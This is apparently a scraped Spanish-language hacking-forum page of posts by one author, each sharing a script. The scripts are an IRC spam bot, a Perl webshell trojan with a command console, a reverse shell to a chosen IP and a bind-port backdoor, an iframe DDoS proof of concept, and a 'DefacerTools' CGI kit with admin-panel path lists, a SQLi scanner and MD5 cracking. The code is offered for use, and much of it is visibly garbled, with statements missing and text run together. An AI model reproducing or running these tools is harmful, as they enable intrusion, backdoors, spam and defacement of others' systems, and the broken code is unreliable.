Programación / Scripting / [Perl] IRC Spam 0.3
en: 19 Enero 2012, 20:34 pm
Un simple script para hacer spam molesto a cada uno de los usuarios que esten en en canal , el spam lo pueden editar con una pagina cualquiera o lo que quieran promocionar. #!usr/bin/perl #IRC Spam 0.3 #Coded By Doddy H use IO::Socket; my @msg_users = ( "Hola", "Chau" ); #Spam to users my @msg_canal = ( "Hola a todos", "que ondaaa" ); #Spam to canal my @bots = ( "Jebus", "Ramona" ); #Names of the bots &head; unless ( @ARGV == 2 ) { &sintax; } else { print "\n[+] Connecting\n\n"; if ( my $socket = new IO::Socket::INET( PeerAddr => $ARGV[0], PeerPort => 6667, Proto => "tcp" ) ) { my $nombre = $bots[ rand(@bots) ]; print $socket "NICK $nombre\r\n"; print $socket "USER $nombre 1 1 1 1\r\n"; print $socket "JOIN $ARGV[1]\r\n"; print "[+] Spammer Online\n\n"; while ( my $log = <$socket> ) { if ( $log =~ /^PING(.*)$/i ) { print $socket "PONG $1\r\n"; } if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) { while (true) { my $pro = $4; print $socket "PRIVMSG $ARGV[1] " . $msg_canal[ rand(@msg_canal) ] . "\r\n"; my @nicks = split " ", $pro; foreach $names (@nicks) { unless ( $nombre eq $names ) { $names =~ s/\@//; "MSG $names $msg_users[rand(@msg_users)]\r\n"; print "[+] Spam : $names !\n"; } } } } } } else { } } ©right; sub sintax { print "\n[+] : $0 <server> <channel>\n"; } sub head { @ @@@@@ @@@@ @@@ @@@@@ @ @ @ @ @ @@@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@ @@ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@ @@ @@ @ @ @ @ @@@@@ @ @@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@ @ @ @ @ @ @ @ @@@@@ @ @ ); } sub copyright { print "\n\n(C) Doddy Hackman 2012\n\n"; } # The End ?
Programación / Scripting / [Perl] Commander 0.3
en: 19 Enero 2012, 20:34 pm
Una mejora de un troyano al estilo webshell que habia hecho el verano pasado. #!usr/bin/perl # #C0mmand3r (C) Doddy HAckman 2012 #Version 0.3 # #A simple WebShell in Perl # # use IO::Socket; use CGI; use Cwd; use Win32; my $port = rep(); sub rep { unless ( $ARGV[0] ) { } else { } } print "\n\n#########################################\n\n"; print "C0mmand3r (C) Doddy HAckman 2012\n\n\n"; print "[+] Starting the webshell on port $port\n\n"; print "#########################################\n\n"; my $sock = new IO::Socket::INET( LocalHost => 'localhost', LocalPort => $port, Proto => 'tcp', Listen => SOMAXCONN, Reuse => 1 ); while ( $jebus = $sock->accept() ) { print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n"; #print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n"; while ( $response = <$jebus> ) { my %rta; if ( $response =~ /GET/ig ) { capturar($response); } sub capturar { if ( $aa =~ /GET \/(.*) HTTP\/1.1/ig ) { my $todo = $1; if ( $todo =~ /\?(.*)=(.*)&(.*)=(.*)/ig ) { $rta{$1} = $2; $rta{$3} = $4; } if ( $todo =~ /\?(.*)=(.*)/ig ) { $rta{$1} = $2; } } } <style type=text/css> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { font: normal 16px Verdana, Arial, Helvetica, sans-serif; background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select,fieldset { background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 16px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style> "; if ( $rta{'info'} ) { info(); print $jebus "<center><br><br><b>IP : </b>" . get_ip () . "<br>"; print $jebus "<center><br><br><b>Domain : </b>" . Win32::DomainName() . "<br>"; print $jebus "<b>Chip : </b>" . Win32 ::GetChipName() . "<br>"; print $jebus "<b>OS : </b>" . 
Win32 ::GetOSName() . "<br>"; print $jebus "<b>Version : </b>" . Win32 ::GetOSVersion() . "<br>"; print $jebus "<b>User : </b>" . Win32::LoginName() . "<br><br></center>"; copyright(); } elsif ( $rta{'console'} ) { logouno(); <br><br><center> <form action='' method=GET> Command : <input type=text name=cmd value=ver><input type=submit value=Execute> </center></form><br><br> "; copyright(); } elsif ( $rta{'cmd'} ) { logouno(); $lucha = $rta{'cmd'}; print $jebus "<br><br><center><fieldset>"; $lucha =~ s/\+/ /; print $jebus "<br>[+] Command : <b>$lucha</b><br><br>"; print $jebus "</center></fieldset>"; copyright(); } elsif ( $rta{'reverse'} ) { logodos(); <center> <br><br><b>ReverseShell</b><br><br> <form action='' method=GET> <b>Your IP</B> : <input type=text name=ipconnect value=localhost><br> <b>Port</b> : <input type=text name=port value=666><br> <br><input type=submit value=Connect></form><br><br> </center> ); copyright(); } elsif ( $rta{'ipconnect'} ) { conectar( $rta{'ipconnect'}, $rta{'port'} ); tipo(); sub conectar { connect( REVERSE , sockaddr_in ( $_[1], inet_aton ( $_[0] ) ) ); open( STDIN, ">&REVERSE" ); open( STDOUT, ">&REVERSE" ); open( STDERR, ">&REVERSE" ); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ( $^O =~ /Win32/ig ) { infowin(); } else { infolinux(); #root(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "[+] Domain Name : " . Win32 ::DomainName() . "\n"; print "[+] OS Version : " . Win32 ::GetOSName() . "\n"; print "[+] Username : " . Win32 ::LoginName() . 
"\n\n\n"; } sub infolinux { print "[+] System information\n\n"; } } elsif ( $rta{'backdoor'} ) { logotres(); <center> <br><br><b>BindPort</b><br><br> <form action='' method=GET> <b>Port</b> : <input type=text name=portbind value=666><br> <br><input type=submit value=Bind></form><br><br> </center> ); copyright(); } elsif ( $rta{'portbind'} ) { $backdoor = IO::Socket::INET->new( Proto => 'tcp', LocalPort => $rta{'portbind'}, Listen => SOMAXC, Reuse => 1 ); while ( $jesus = $backdoor->accept() ) { $jesus->autoflush(1); "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : " . $$ . "\n\n"; print $jesus "Welcome " . $jesus->peerhost . "\n\n"; &extras; $dir = getcwd(); print $jesus $dir . ">>"; while (<$jesus>) { print $jesus "\n\n" . $yeah . "\n\n"; print $jesus $dir . ">>"; } } sub extras { if ( $^O =~ //ig ) { print $jesus "[+] Domain Name : " . Win32::DomainName() . "\n"; print $jesus "[+] OS Version : " . Win32::GetOSName() . "\n"; print $jesus "[+] Username : " . Win32::LoginName() . "\n\n\n"; } else { print $jesus "--==System Info==--\n\n" . 
$s; } } } elsif ( $rta{'about'} ) { about(); <pre><center> ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾ ¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾¾ ¾ ¾ ¾ ¾¾¾¾ ¾ ¾ ¾ ¾¾ ¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾ ¾¾¾¾ </pre></center> ); copyright(); } else { <title>Commander 0.3 (C) Doddy Hackman 2012</title> <br><br> <h1><center>Commander</center></h1> <br><br> <center> <table border=1> <td class=main><center><b>Tools</b></center></td><tr> <td class=main><a href=?info=true><center>Information</center></a></td><tr> <td class=main><a href=?console=true><center>Console</center></a></td><tr> <td class=main><a href=?backdoor=true><center>Backdoor</center></a></td><tr> <td class=main><a href=?reverse=true><center>ReverseShell</center></a></td><tr> <td class=main><a href=?about=true><center>About</center></a></td> </table> </center> "; copyright(); } $jebus->close; } } continue { $jebus->close; } sub logouno { <pre><center> @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@ @@@@ @@@@ @@@@@@ @@ @@@@@@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@@@@@ @@ @@ @@@@ @@@@@@ @@ @@@@@@ </pre></center> ); } sub logodos { <pre><center> @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@@@@@ @@ @@ @@@@@@ @@@@ @@@@ @@@@@@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@ @@ @@ @@@@@@@@@@ @@ @@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ 
@@ @@ @@ @@ @@ @@@@@@ @@ @@@@@@ @@ @@@@ @@@@@@ </pre></center> ); } sub logotres { <pre><center> @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ @@@@@@ @@@@ @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@@@@@@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ @@@@@@ @@ </pre></center> ); } sub about { <pre><center> @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@@@@@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@@@@@@@ @@@@@@ @@@@ @@ @@ </pre></center> ); } sub info { <pre><center> @@ @@ @@ @@@@@@@@@@ @@@@@@@@ @@ @@@@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ </pre></center> ); } sub get_ip { } sub copyright { "<br><br><br><br><center><h1>Coded By Doddy H</h2></center><br><br>"; } # The End ?
Programación / Programación C/C++ / [C] ScanPort
en: 8 Enero 2012, 18:42 pm
Un simple programa para scannear puertos, solo funciona bajo linux. /** * ScanPort 0.1 * Coded by Doddy H **/ #include<stdio.h> #include<sys/socket.h> #include<sys/types.h> #include<stdlib.h> #include<netdb.h> void head() { printf("\n-- == ScanPort 0.1 == --\n"); } void end() { printf("\n\nWritten By Doddy H\n\n"); } int main(int argc,char **argv) { char *ip; int port,control,partedos,portstart,portend; struct sockaddr_in parteuno; head(); if(argc != 4) { printf("\n[+] sintax : port <ip> <portstart> <portend>"); } else { ip = argv[1]; portstart = atoi(argv [2]); printf("\n[+] Scanning %s\n",ip ); printf("\n[+] Parameters : %d-%d\n",portstart ,portend ); for(port=portstart;port<portend;port++) { parteuno.sin_family=AF_INET; parteuno.sin_port=htons(port); parteuno.sin_addr.s_addr=inet_addr(ip); partedos=socket(AF_INET,SOCK_STREAM,0); control=connect(partedos,(struct sockaddr_in *)&parteuno,sizeof(parteuno)); if(control>=0) { printf("\n[+] Port Found : %d",port ); } } } end(); return 0; } /** The End ? **/
Programación / Programación C/C++ / [C] ResolveIP
en: 8 Enero 2012, 18:41 pm
Un simple programa para saber la IP de cualquier host. /** * ResolveIP 0.1 * Written By Doddy H * Thanks to CrashCool */ #include <winsock.h> #include <stdio.h> void head() { printf("\n -- == ResolveIP 0.1 == --\n\n"); } void end() { printf("\n\n -- == Written By Doddy H == --\n"); } int main(int argc, char *argv[]) { char *dom,*host,*ip; struct hostent *parteuno; WSADATA partedos; head(); if(argc != 2) { printf("\n[+] Sintax : resolve <host>\n"); } else { dom = argv[1]; WSAStartup(MAKEWORD(1,1),&partedos); parteuno = gethostbyname(dom); if(parteuno==NULL) { end(); } host = parteuno->h_name; ip = inet_ntoa(*((struct in_addr *)parteuno->h_addr)); printf("\n[+] HOST : %s",host ); } end(); return 0; } /* The End */
Programación / Programación C/C++ / [C] Manager
en: 8 Enero 2012, 18:40 pm
Un simple programa para manejar los procesos de Windows. /** Simple process manager Coded By Doddy H **/ #include <windows.h> #include <Tlhelp32.h> #include <stdio.h> int main() { HANDLE parteuno,partedos; PROCESSENTRY32 control; int re,pid; printf("\n\n-- == Manager == --\n\n"); printf("2 - Close Process\n"); while(1) { if (re==1) { printf("\n[+] Getting process..\n\n"); parteuno = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); Process32First(parteuno,&control); while(Process32Next(parteuno,&control)){ printf("[+] Process : %s \n",control. szExeFile); printf("[+] PID : %i\n\n",control. th32ProcessID); } CloseHandle(parteuno); } else if (re==2) { partedos =OpenProcess(PROCESS_TERMINATE,0,pid); if (TerminateProcess(partedos,0)) { printf("\n[+] Process Closed\n\n"); } else { } CloseHandle(partedos); } else if (re==3) { printf("\n\nWritten By Doddy H\n\n"); } } return 0; } /** The End ? **/
Programación / Programación C/C++ / [C] Iframe DDOS
en: 8 Enero 2012, 18:38 pm
Un simple POC para iframe DDOS /** * Simple POC for IFRAME DDOS * Coded By Doddy H */ #include <stdio.h> void head() { printf("\n -- == IFRAME DDOS 0.1 == --\n\n"); } void end() { printf("\n\n -- == Coded By Doddy H == --\n"); } int main ( int argc, char **argv ) { char *target; int i,count; FILE *archivo; head(); if(argc != 3) { printf("\n[+] Sintax : ddos <target> <count>\n"); } else { target = argv[1]; printf("\n[+] Starting the party"); archivo = fopen ("poc.html","a+"); for(i=0;i<=count;i++) { fprintf(archivo ,"%s","<iframe src='"); fprintf(archivo ,"%s","' width='3' height='3'></iframe><br>\n"); } } end(); return 0; } /** The End ? */
Programación / Programación C/C++ / [C] Hex Converter
en: 8 Enero 2012, 18:37 pm
Un simple programa para convertir texto en hex /** * Hex Converter * Coded By Doddy H * Based in hex encoder by Ka0x */ #include <stdio.h> #include <string.h> void head() { printf("\n -- == Hex Converter == --\n\n"); } void end() { printf("\n\n\n -- == Coded By Doddy H == --\n"); } int main ( int argc, char **argv ) { char *text; int i,total; head(); if(argc != 2) { printf("\n[+] Sintax : hex <text>"); } else { text = argv[1]; printf("\n[Text] : %s\n",text ); for(i=0;i<total;i++){ } } end(); return 0; } /** The End ? */
Programación / Scripting / [Perl] DefacerTools 0.5 (regalo de navidad)
en: 11 Diciembre 2011, 01:03 am
Hola, acá les traigo un regalo de navidad que hice en 3 horas: es un programa en CGI para usar en webs que lo soporten. Hice todas las pruebas con XAMPP y al parecer todo funciona bien. Las funciones del programa son: - HexConverter
- PanelFinder
- PathsFinder
- SQLi Scanner
- FuzzDNS
- FinderPass
- PortScanner
El codigo del programa (formateado con perltidy) es defacertools.cgi#!"\xampp\perl\bin\perl.exe" # #DefacerTools 0.5 # #(C) Doddy Hackman 2012 # # use CGI; use LWP::UserAgent; use URI ::Split qw(uri_split ); use HTML::LinkExtor; use IO::Socket; @panels = ( 'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp', 'asp/admin/admin.aspx', 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx', 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp', 'login/index.aspx', 'login/login.asp', 'login/login.aspx', 'login/admin.asp', 'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx', 'administracion/login.asp', 'administracion/login.aspx', 'administracion/webmaster.asp', 'administracion/webmaster.aspx', 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/', 'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php', 'administracion/', 'administracion/index.php', 'administracion/login.php', 'administracion/ingresar.php', 'administracion/admin.php', 'administration/', 'administration/index.php', 'administration/login.php', 'administrator/index.php', 'administrator/login.php', 'administrator/system.php', 'system/', 'system/login.php', 'admin.php', 'login.php', 'administrador.php', 'administration.php', 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/home.php', 'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/', 'administrator/index.html', 
'administrator/login.html', 'administrator/account.html', 'administrator/account.php', 'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php', 'moderator.html', 'moderator/login.php', 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php', 'controlpanel.html', 'admincontrol.php', 'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp', 'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp', 'administrator/index.asp', 'administrator/login.asp', 'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp', 'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html', 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp', 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp', 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/', 'useradmin/', 'sysadmins/', 'admin1/', 'system-administration/', 'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/', 'login-redirect/', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 
'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/', 'login-us/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/', 'openvpnadmin/', 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/', 'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/', 'system_administration/', 'ss_vms_admin_sm/' ); my @dns = ('www'); #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','tr
endmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'); my $nave = LWP::UserAgent->new; $nave->agent( "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12" ); $nave->timeout(5); my %rta; my $que = new CGI; my @ques = $que->param; for (@ques) { $rta{$_} = $que->param($_); } print "Content-type:text/html\n\n"; <style type=text/css> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { font: normal 16px Verdana, Arial, Helvetica, sans-serif; background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select { background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 16px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style>"; if ( $rta{'hex'} ) { logouno(); qq(<form method =post action =''><b>Text to encode : </b ><input type =text name =textocode value =test ><input type =submit name =codificar value =Encode ></form >); copyright(); } elsif ( $rta{'textocode'} ) { logouno(); print "[+] Encode : <b>" . encode ( $rta{'textocode'} ) . 
"</b><br><br>"; copyright(); } elsif ( $rta{'panelfinder'} ) { logodos(); qq(<form method =post action =''><b>Page : </b ><input type =text name =buscarpanel value =http ://localhost /><input type =submit value =Find ></form >); copyright(); } elsif ( $rta{'buscarpanel'} ) { my $page = $rta{'buscarpanel'}; logodos(); print "<br>[+] Scanning $page<br><br>"; for $path (@panels) { $code = tomax( $page . "/" . $path ); if ( $code->is_success ) { print "[Link] : " . $page . "/" . $path . "<br>"; } } print "<br><br>[+] Finish<br>"; copyright(); } elsif ( $rta{'pathsfinder'} ) { logotres(); qq(<form method =post action =''><b>Page : </b ><input type =text name =buscarpaths value =http ://localhost /doddy ><input type =submit name =codificar value =Find ></form >); copyright(); } elsif ( $rta{'buscarpaths'} ) { logotres(); my $page = $rta{'buscarpaths'}; my $code = toma($page); my @links = get_links($code); print "<br><br>[+] Finding paths<br><br>"; for my $com (@links) { my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page); if ( $path =~ /\/(.*)$/ ) { my $path1 = $1; $page =~ s/$path1//ig; my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); if ( $path =~ /(.*)\// ) { my $parche = $1; unless ( $repetidos =~ /$parche/ ) { $repetidos .= " " . $parche; my $code = toma( "http://" . $auth . 
$parche ); if ( $code =~ /Index of (.*)</ig ) { my $dir_found = $1; print "[+] Directory Found : $page/$dir_found<br>"; } } } } } print "<br><br>[+]Finished<br>"; copyright(); } elsif ( $rta{'sqliscanner'} ) { logocuatro(); qq(<form method =post action =''><b>Page : </b ><input type =text name =buscarsql value =http ://localhost /sql .php ?id =><input type =submit name =codificar value =Scan ></form >); copyright(); } elsif ( $rta{'buscarsql'} ) { logocuatro(); print "<br><br>[+] Scanning page<br><br>"; &length( $rta{'buscarsql'} ); print "<br><br>[+] Finished"; copyright(); } elsif ( $rta{'fuzzdns'} ) { logocinco(); qq(<form method =post action =''><b>Host : </b ><input type =text name =buscardns value =google .com ><input type =submit name =codificar value =Scan ></form >); copyright(); } elsif ( $rta{'buscardns'} ) { logocinco(); my $page = $rta{'buscardns'}; print "<br><br>[+] Searching DNS to " . $page . ".....<br><br><br>"; for my $path (@dns) { $code = tomax( "http://" . $path . "." . $page ); if ( $code->is_success ) { print "[+] Found : http://" . $path . "." . $page . 
"<br>"; } } print "<br><br>[+] Finished<br><br>"; copyright(); } elsif ( $rta{'finderpass'} ) { logoseis(); qq(<form method =post action =''><b>MD5 : </b ><input type =text name =buscarhash value =202cb962ac59075b964b07152d234b70 ><input type =submit name =codificar value =Scan ></form >); copyright(); } elsif ( $rta{'buscarhash'} ) { logoseis(); &crackit( $rta{'buscarhash'} ); copyright(); } elsif ( $rta{'portscanner'} ) { logosiete(); qq(<form method =post action =''><b>IP : </b ><input type =text name =buscarpuertos value =localhost ><input type =submit name =codificar value =Scan ></form >); copyright(); } elsif ( $rta{'buscarpuertos'} ) { logosiete(); scanuno( $rta{'buscarpuertos'} ); copyright(); } elsif ( $rta{'home'} ) { sintax(); } else { sintax(); } sub sintax { <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title> <br><br> <h1><center>DefacerTools</center></h1> <br><br> <center> <table border=1> <td class=main><center><b>Tools</b></center></td><tr> <td class =main ><a href =?hex=true ><center>HexConverter </center ></a ></td ><tr> <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr> <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr> <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr> <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr> <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr> <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td> </table> </center> ); } sub logouno { <center> <pre> @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @@@ @ @@ @ @ @@@ @@ @@ @@@ @@ @@@@@@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@@ @@@ @ @ @ @@@ @ @ @@@ @ </pre> ); } sub logodos { <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ 
